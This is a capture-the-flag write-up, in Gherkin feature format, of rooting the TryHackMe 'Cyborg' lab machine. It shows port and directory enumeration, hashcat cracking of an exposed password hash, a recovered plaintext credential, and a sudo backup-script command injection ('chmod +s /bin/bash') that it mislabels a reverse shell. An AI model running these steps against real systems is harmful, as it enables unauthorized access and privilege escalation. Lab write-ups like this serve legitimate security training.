## Version 2.0
## language: en

Feature: Cyborg

  Site:
    www.tryhackme.com
  User:
    thecyberpunker
  Goal:
    Get root and user flags

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Parrot OS       | 4.11      |
    | Google Chrome   | 89.0.4    |
    | Gobuster        | 3.1.0     |
    | Nmap            | 7.9.1     |
    | Openvpn         | 2.5.1     |
    | Hashcat         | 6.1.1     |
    | OpenSSH         | 8.4p1     |

  Machine information:
    Given I am accessing the challenge through the URL
    """
    https://tryhackme.com/room/cyborgt8
    """
    When I got an ip address "10.10.25.76"
    Then I start a Nmap service enumeration
    """
    nmap -sC -sV 10.10.25.76
    """
    And I got some open ports and Ubuntu OS [evidence](1.png)
    """
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    """
    Then I open the IP in the browser [evidence](2.png)
    And I see an Apache2 Ubuntu Default Page

  Scenario: Success: Exploit the website
    Given I have information about the target machine
    When I try to get the directory list [evidence](3.png)
    """
    gobuster dir -u http://10.10.25.76 -w dict.txt -t 50
    """
    And I got some directories [evidence](4.png)
    When I go to "/etc" directory
    And I realize about two files inside the folder "squid"
    """
    passwd
    squid.conf
    """
    And I downloaded the file "passwd"
    And I cracked the file "passwd" with Hashcat [evidence](5.png)
    """
    hashcat -m 1600 passwd /usr/share/wordlists/rockyou.txt
    squidward
    """
    Then I go to "/admin" directory
    And I got a ".gz" file to download [evidence](6.png)
    When I unzipped the file
    And I realize about the files are encrypted
    And I see the "README" file [evidence](7.png)
    """
    This is a Borg Backup repository.
    See https://borgbackup.readthedocs.io/
    """
    Then I install Borg [evidence](8.png)
    """
    sudo apt install borgbackup
    """
    And I extracted the final file with Borg Backup
    """
    borg extract home/field/dev/final_archive/::music_archive
    password: squidward
    """
    When I see the secret file in the directory extracted [evidence](9.png)
    And I realize that I found the password "alex:S3cretP@s3"

  Scenario: Fail: Try to open an SSH session
    Given the information about the flags
    When I try to open an SSH session with the user alex
    And I got refuse by the server
    Then I try to ping the host
    And I do not get ping response
    And I try to reset the machine

  Scenario: Success: Try to open another SSH session
    Given the new information of the host IP address
    """
    10.10.212.246
    """
    When I try to open an SSH session with the user alex
    Then I got access to the ssh session [evidence](10.png)
    And I see the user permissions [evidence](11.png)

  Scenario: Success: Perform a Reverse Shell
    Given that I have an SSH session
    And I realize about the file "backup.sh"
    When I see the file content [evidence](12.png)
    Then I try to create a reverse shell
    """
    sudo /etc/mp3backups/./backup.sh -c 'chmod +s /bin/bash'
    """
    And I got root access [evidence](13.png)
    Then I go to the root directory "cd /root"
    And I found the "root.txt" file
    When I see the file content [evidence](14.png)
    And I see the flag
    And I got the machine [evidence](15.png)
